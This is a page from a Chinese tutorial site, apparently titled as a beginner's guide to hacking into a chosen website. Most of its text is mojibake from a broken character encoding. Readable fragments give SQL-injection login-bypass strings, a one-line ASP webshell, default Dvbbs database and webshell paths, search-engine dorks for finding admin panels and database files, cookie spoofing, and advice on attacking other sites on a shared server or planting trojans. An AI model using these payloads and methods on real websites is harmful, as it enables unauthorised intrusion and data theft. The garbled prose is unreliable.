½Ì²ËÄñÈëÇÖÖ¸¶¨ÍøÕ¾£¡ -µçÄÔ×ÊÁÏ

µçÄÔ×ÊÁÏ Ê±¼ä£º2019-01-01 ÎÒҪͶ¸å
¡¾www.unjs.com - µçÄÔ×ÊÁÏ¡¿

    Ê×ÏÈ£¬¹Û²ìÖ¸¶¨ÍøÕ¾£¬

½Ì²ËÄñÈëÇÖÖ¸¶¨ÍøÕ¾£¡

¡£

    ÈëÇÖÖ¸¶¨ÍøÕ¾ÊÇÐèÒªÌõ¼þµÄ£º

    ÒªÏȹ۲ìÕâ¸öÍøÕ¾ÊǶ¯Ì¬»¹ÊǾ²Ì¬µÄ¡£

    Ê×ÏȽéÉÜÏÂʲôÑùÕ¾µã¿ÉÒÔÈëÇÖ£ºÎÒÈÏΪ±ØÐëÊǶ¯Ì¬µÄÍøÕ¾ ÈçASP¡¢PHP¡¢ JSPµÈ´úÂë±àдµÄÕ¾µã

    Èç¹ûÊǾ²Ì¬µÄ£¨.htm»òhtml£©,Ò»°ãÊDz»»á³É¹¦µÄ¡£

    Èç¹ûÒªÈëÇÖµÄÄ¿±êÍøÕ¾ÊǶ¯Ì¬µÄ£¬¾Í¿ÉÒÔÀûÓö¯Ì¬ÍøÕ¾µÄ©¶´½øÐÐÈëÇÖ¡£

    Quote:

    ÒÔÏÂÊÇÈëÇÖÍøÕ¾³£Ó÷½·¨£º

    1.ÉÏ´«Â©¶´

    Èç¹û¿´µ½:Ñ¡ÔñÄãÒªÉÏ´«µÄÎļþ [ÖØÐÂÉÏ´«]»òÕß³öÏÖ“ÇëµÇ½ºóʹÓÔ£¬80%¾ÍÓЩ¶´ÁË£¡

    ÓÐʱÉÏ´«²»Ò»¶¨»á³É¹¦,ÕâÊÇÒòΪCookies²»Ò»Ñù.ÎÒÃǾÍÒªÓÃWSockExpertÈ¡µÃCookies.ÔÙÓÃDOMAINÉÏ´«.

    2.×¢Èë©¶´

    ×Ö·û¹ýÂ˲»ÑÏÔì³ÉµÄ

    3.±©¿â:°Ñ¶þ¼¶Ä¿Â¼ÖмäµÄ/»»³É%5c

    4.’or’=’or’ÕâÊÇÒ»¸ö¿ÉÒÔÁ¬½ÓSQLµÄÓïÃû¾ä.¿ÉÒÔÖ±½Ó½øÈëºǫ́¡£ÎÒÊÕ¼¯ÁËһϡ£ÀàËÆµÄ»¹ÓУº

    ’or’’=’¡¡" or "a"="a¡¡¡¡ ’) or (’a’=’a¡¡¡¡ ") or ("a"="a¡¡¡¡or 1=1--¡¡ ’ or ’a’=’a

    5.Éç»á¹¤³Ìѧ¡£Õâ¸öÎÒÃǶ¼ÖªµÀ°É¡£¾ÍÊDz½⡣

    6.дÈëASP¸ñʽÊý¾Ý¿â¡£¾ÍÊÇÒ»¾ä»°Ä¾Âí¡´%execute request("value")%¡µ £¨Êý¾Ý¿â±ØÐèµÃÊÇASP»òASAµÄºó׺£©

    7.Ô´ÂëÀûÓãºÒ»Ð©ÍøÕ¾ÓõͼÊÇÍøÉÏÏÂÔØµÄÔ´Âë.ÓеÄÕ¾³¤ºÜÀÁ.ʲôҲ²»¸Ä.

    ±ÈÈ磺ĬÈÏÊý¾Ý¿â£¬Ä¬ÈϺǫ́µØÖ·£¬Ä¬ÈϹÜÀíÔ±ÕʺÅÃÜÂëµÈ

    8.ĬÈÏÊý¾Ý¿â/webshell·¾¶ÀûÓÃ:ÕâÑùµÄÍøÕ¾ºÜ¶à/ÀûÈ˱ðÈ˵ÄWEBSHELL.

    /Databackup/dvbbs7.MDB

    /bbs/Databackup/dvbbs7.MDB

    /bbs/Data/dvbbs7.MDB

    /data/dvbbs7.mdb

    /bbs/diy.asp

    /diy.asp

    /bbs/cmd.asp

    /bbs/cmd.exe

    /bbs/s-u.exe

    /bbs/servu.exe

    ¹¤¾ß£ºÍøÕ¾ÁÔÊÖ¡¡ÍÚ¾ò¼¦ Ã÷С×Ó

    9.²é¿´Ä¿Â¼·¨:Ò»Ð©ÍøÕ¾¿ÉÒÔ¶Ï¿ªÄ¿Â¼£¬¿ÉÒÔ·ÃÎÊĿ¼¡£

    210.37.95.65 images

    10.¹¤¾ßÒç³ö

    11.ËÑË÷ÒýÇæÀûÓÃ:

    (1).inurl:flasher_list.asp¡¡ ĬÈÏÊý¾Ý¿â:database/flash.mdb¡¡ ºǫ́/manager/

    (2).ÕÒÍøÕ¾µÄ¹ÜÀíºǫ́µØÖ·:

    site:xxxx.comintext:¹ÜÀí

    site:xxxx.comintitle:¹ÜÀí¡¡ ¡´¹Ø¼ü×ֺܶ࣬×ÔÒÑÕÒ¡µ

    site:xxxx.cominurl:login

    (3).²éÕÒaccessµÄÊý¾Ý¿â,mssql¡¢mysqlµÄÁ¬½ÓÎļþ

    allinurl:bbsdata

    filetype:mdbinurl:database

    filetype:incconn

    inurl:datafiletype:mdb

    12.COOKIEÕ©Æ­£º°Ñ×Ô¼ºµÄIDÐ޸ijɹÜÀíÔ±µÄ£¬MD5ÃÜÂëÒ²Ð޸ijÉËûµÄ£¬ÓùðÁÖÀϱø¹¤¾ß¿ÉÒÔÐÞ¸ÄCOOKIE£¬

µçÄÔ×ÊÁÏ

¡¶½Ì²ËÄñÈëÇÖÖ¸¶¨ÍøÕ¾£¡¡·(https://www.unjs.com)¡£

    13.ÀûÓó£¼ûµÄ©¶´£ºÈç¶¯ÍøBBS

    ¿ÉÒÔÏÈÓÃ:dvbbsȨÏÞÌáÉý¹¤¾ß£¬Ê¹×ÔÒѳÉΪǰ̨¹ÜÀíÔ±¡£

    THEN£¬ÔËÓÃ:¶¯Íø¹Ì¶¥Ìù¹¤¾ß£¬ÕÒ¸ö¹Ì¶¥Ìù£¬ÔÙÈ¡µÃCOOKIES£¬Õâ¸öÒªÄã×ÔÒÑ×ö¡£ÎÒÃÇ¿ÉÒÔÓÃWSockExpertÈ¡µÃCookies/NC°ü

    Õâ¸öÎҾͲ»×öÁË£¬ÍøÉϽ̶̳àµÄÊÇ£¬×ÔÒÑϸö¿´¿´¡£

    ¹¤¾ß£ºdvbbsȨÏÞÌáÉý¹¤¾ß¡¡ ¶¯Íø¹Ì¶¥Ìù¹¤¾ß

    14.»¹ÓÐһЩÀÏ©¶´¡£ÈçIIS3£¬4µÄ²é¿´Ô´Â룬5µÄDELETE

    CGI£¬PHPµÄһЩÀ϶´£¬ÎҾͲ»ËµÁ˰¡¡£¡£Ì«ÀÏÁË¡£Ã»ÓÐʲô´óÓÃ;¡£

    #######################################

    Ò»°ãÈëÇÖ˼·

    ½Å±¾×¢È루ASP PHP JSP£©

    1.½Å±¾Â©¶´

    ÆäËü½Å±¾Â©¶´£¨ÉÏ´«Â©¶´£¬¿çվ©¶´µÈ£©

    ÓòÃûÅÔ×¢

    2.ÅÔ×¢

    “IP”ÅÔ×¢

    ±¾µØÒç³ö

    3.Òç³ö©¶´

    Ô¶³ÌÒç³ö

    ARPÆÛÆ­

    4.ÍøÂç

    IPÆÛÆ­

    5.Éç»á¹¤³Ìѧ

    ¼òµ¥µÄ˵£¬¿ÉÒÔÀûÓÃÒÔÉÏ·½·¨À´ÈëÇÖ£¬Èç¹ûÕâ¸öÖ¸¶¨ÍøÕ¾µÄȷûÓЩ¶´£¬»¹¿ÉÒÔÀûÓÃÆäËü·½Ê½¡£¡£¡£

    #######################################

    ¡þͨÍùµçÄԵķ²»Ö¹Ò»Ìõ¡þ

    Èç¹ûÄ¿±êÍøÕ¾³ÌÐòûÓЩ¶´£¬¿ÉÒÔ°´ÕÕÒÔÏ·½·¨£º

    Ê×ÏÈÅж϶Է½ÍøÕ¾·þÎñÆ÷Ö÷»úµÄIPµØÖ·£¬±ÈÈ磺ping www.baidu.com£¬¾Í¿ÉÒԵõ½°Ù¶ÈÍøÕ¾µÄ·þÎñÆ÷IPµØÖ·£¬µ±È»Ò²¿ÉÒÔÀûÓÃÅÔ×¢µÈ¹¤¾ßÀ´²éѯĿ±êÍøÕ¾·þÎñÆ÷µÄIPµØÖ·¡£¡£¡£

    ¿ÉÒÔÊÔ×ÅÈëÇÖÄ¿±êÍøÕ¾ËùÔڵķþÎñÆ÷£¬¿ÉÒÔÓÃÅÔ×¢¹¤¾ßÀ´²éѯÕâ¸ö·þÎñÆ÷É϶¼·ÅÁ˶àÉÙ¸öÍøÕ¾¡£¡£¡£

    Èç¹ûÄ¿±êÍøÕ¾Ã»ÓЩ¶´£¬¿ÉÒÔÊÔ×ÅÈëÇÖͬ·þÎñÆ÷ÉÏµÄÆäËüÍøÕ¾¡£¡£¡£Èç¹ûÄܹ»ÈëÇÖͬ·þÎñÆ÷ÉÏµÄÆäËüÍøÕ¾£¬¾Í¿ÉÒÔ»ñµÃȨÏÞ£¬¿´Äܲ»Äܹ»ÌáȨÄõ½·þÎñÆ÷µÈ¡£

    Ò²¿ÉÒÔÖ±½ÓÈëÇÖÕâÌ¨ÍøÕ¾µÄ·þÎñÆ÷£¡

    ±ÈÈ磺ÓÃIP¶Ë¿ÚɨÃèÈí¼þ£¬É¨ÃèÒ»ÏÂÄ¿±ê·þÎñÆ÷¶¼¿ª·ÅÁËÄÄЩ¶Ë¿Ú£¬È»ºóÀûÓÿª·ÅµÄ©¶´¶Ë¿Ú½øÐÐÈëÇÖ¡£³£¼û©¶´¶Ë¿ÚÈçºÎÈëÇÖ£¬ÂÛ̳ÒѾ­ÓкܶàÕâ·½ÃæµÄ×ÊÁÏÁË¡£»¹¿ÉÒÔ²éѯĿ±ê·þÎñÆ÷ÓÐÄÄЩ©¶´£¬±ÈÈç΢Èí×îÐÂOday©¶´£¬ÀûÓé¶´Äõ½·þÎñÆ÷ȨÏÞ¡£Ä¾ÂíÈëÇÖ£¬ÈÃÍøÕ¾Ö÷»ú¸ÐȾÄãµÄľÂí¡£Ö÷ÒªÊÇ¿´Ä¿±êÍøÕ¾·þÎñÆ÷ϵͳÊÇ·ñ´æÔÚ©¶´¡£

    »¶Ó­´ó¼Ò½øÐм¼Êõ½»Á÷£¡

×îÐÂÎÄÕÂ